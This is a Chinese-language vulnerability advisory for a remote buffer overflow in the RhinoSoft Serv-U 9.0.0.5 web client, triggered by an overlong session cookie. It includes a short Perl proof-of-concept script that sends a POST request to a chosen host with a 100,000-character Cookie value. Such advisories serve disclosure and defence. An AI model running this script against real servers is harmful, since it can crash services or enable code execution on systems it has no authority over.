Serv-U Web客戶端HTTP請求遠程溢出漏洞
作者:佚名
遠程溢出##遠程攻擊##立即處理[msg]Serv-U Web客戶端HTTP請求遠程溢出漏洞 影響版本: RhinoSoft Serv-U 9.0.0.5漏洞描述: BUGTRAQ ID: 36895
Serv-U Web客戶端HTTP請求遠程溢出漏洞
影響版本:
RhinoSoft Serv-U 9.0.0.5
漏洞描述:
BUGTRAQ ID: 36895
Serv-U FTP是一款FTP服務程序。
Serv-U產品捆綁有一個簡單的基于瀏覽器的傳輸客戶端,這個客戶端在處理超長的會話Cookie時存在緩沖區(qū)溢出漏洞。如果用戶受騙連接到了惡意服務器并向WebClient HTTP服務返回了超長的會話Cookie,就可能觸發(fā)這個溢出,導致在用戶機器上執(zhí)行任意指令。
---snip--- use IO::Socket; $|=1; $a = "A" x 100000; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '80', Proto => 'tcp'); print $sock "POST / HTTP/1.1\r\n" ."Host: $ARGV[0]\r\n" ."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_ d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814 06246bf8$a\r\n" ."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" ."Content-Length: 0\r\n\r\n"; while (<$sock>) { print; } ---snip--- |
【編輯推薦】
責任編輯:安泉
來源:
黑客防線